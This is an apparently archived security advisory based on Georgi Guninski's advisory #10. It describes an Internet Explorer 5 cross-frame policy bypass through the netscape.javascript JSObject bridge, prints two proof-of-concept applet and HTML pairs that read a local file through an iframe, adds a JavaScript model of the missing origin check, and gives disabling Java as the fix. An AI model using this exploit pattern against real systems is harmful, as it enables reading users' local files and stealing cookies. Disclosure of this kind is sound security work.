COMMAND

    Internet Explorer

SYSTEMS AFFECTED

    IE5

PROBLEM

    The following is based on Georgi Guninski's security advisory #10.
    Internet Explorer 5.01 under Windows 98 (other versions are presumed
    to be vulnerable as well) allows circumventing the "Cross frame
    security policy" by accessing the DOM of documents through
    Java/JavaScript. This exposes the whole DOM of the target document
    and opens up many security risks: reading local files, reading files
    from any host, window spoofing, stealing cookies, etc.

    This is not a bug in the implementation of Java itself. The class
    JSObject, which is the key to the vulnerability, is not part of the
    standard Java API; it lives in the package netscape.javascript, an
    extension library provided by Netscape or Microsoft. The applet uses
    it to obtain the window object, walk document -> I1 -> location, and
    assign a javascript: URL to href; that script then runs in the
    context of the framed document (here a local file), which is exactly
    what the cross-frame policy is supposed to prevent. So this is NOT a
    bug in Java; it is a bug in Microsoft's implementation of the Java
    extension package for JavaScript.

    The code is:

    ------jsinject.html------
    <IFRAME ID="I1" NAME="I1" SRC="file://c:/test.txt"></IFRAME>
    <applet MAYSCRIPT code="jsinject">
    <param name="jscode" value="javascript:alert(document.body.innerText)">
    </applet>
    <A HREF="javascript:document.applets[0].doit()">Read the file</A>

    ------jsinject.java------
    import java.applet.Applet;
    import netscape.javascript.*;

    public class jsinject extends Applet {

        // Called from the page via document.applets[0].doit()
        public void doit()
        {
            try
            {
                // window object of the page hosting the applet
                JSObject win = (JSObject) JSObject.getWindow(this);
                JSObject doc = (JSObject) win.getMember("document");
                // the IFRAME showing a document from another origin
                JSObject I1  = (JSObject) doc.getMember("I1");
                JSObject loc = (JSObject) I1.getMember("location");
                // javascript: URL from the jscode param is assigned
                // without any cross-frame check
                loc.setMember("href", getParameter("jscode"));
            }
            catch (Exception x) { System.out.println(x.toString()); }
        }
    }

    Demonstration is available at:

        http://www.nat.bg/~joro/jsinject.html

    Here is another version of the code, by Hiromitsu Takagi:

    ------jsinject.java-------
    import java.applet.Applet;
    import netscape.javascript.*;
    public class jsinject extends Applet {
        public void start() {
            try {
                JSObject win = (JSObject)JSObject.getWindow(this);
                JSObject doc = (JSObject)win.getMember("document");
                JSObject I1 = (JSObject)doc.getMember("I1");
                JSObject loc = (JSObject)I1.getMember("location");
                loc.setMember("href", getParameter("jscode"));
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }

    ------jsinject.html-------
    <IFRAME ID="I1" NAME="I1" SRC="file://c:/test.txt"></IFRAME>
    <applet MAYSCRIPT code="jsinject">
    <param name="jscode" value="javascript:alert(document.body.innerText)">
    </applet>
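    The following is an added illustration, not code from the advisory
    or from either author: a model of the cross-frame check that the
    JSObject bridge should have applied before honouring the href
    assignment. Origins, the frame object and the URLs are constructed
    sample values; the origin rules (file: treated as opaque, script
    URLs refused across origins) are the ones modern browsers apply.

```javascript
// Origin of a URL: scheme + host (+ port). file: URLs get an opaque
// origin (null) that matches nothing, so they are always cross-origin.
function originOf(href) {
  const u = new URL(href);
  return u.protocol === "file:" ? null : `${u.protocol}//${u.host}`;
}

function sameOrigin(a, b) {
  const oa = originOf(a);
  return oa !== null && oa === originOf(b);
}

// May a script running in callerHref assign newHref to the location of
// a frame currently showing frameHref? Plain navigation of a cross-origin
// frame is tolerated (legacy behaviour); a javascript: URL is not, since
// it would execute inside the frame's origin and expose that frame's DOM.
function checkFrameNavigation(callerHref, frameHref, newHref) {
  const target = new URL(newHref, frameHref);
  if (sameOrigin(callerHref, frameHref)) {
    return { allowed: true, reason: "same origin" };
  }
  if (target.protocol === "javascript:") {
    return { allowed: false, reason: "script URL into cross-origin frame" };
  }
  return { allowed: true, reason: "plain navigation of cross-origin frame" };
}

// Model of the bridge behind JSObject.setMember("href", ...): the shipped
// behaviour writes straight through; the fixed one consults the check
// with the applet's own document as the caller.
function bridgeSetHref(frame, newHref, callerHref, enforce) {
  if (enforce) {
    const v = checkFrameNavigation(callerHref, frame.href, newHref);
    if (!v.allowed) return { navigated: false, reason: v.reason };
  }
  frame.href = newHref;
  return { navigated: true, reason: "assigned" };
}

// The advisory's scenario with constructed values.
const page = "http://host.example/jsinject.html";
const frame = { href: "file:///c:/test.txt" };
const payload = "javascript:alert(document.body.innerText)";
console.log(bridgeSetHref({ ...frame }, payload, page, false)); // navigated: true
console.log(bridgeSetHref({ ...frame }, payload, page, true));  // navigated: false
```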

SOLUTION

    The only way to stop the exploit, and the execution of Active
    Scripting it triggers, is to disable Java.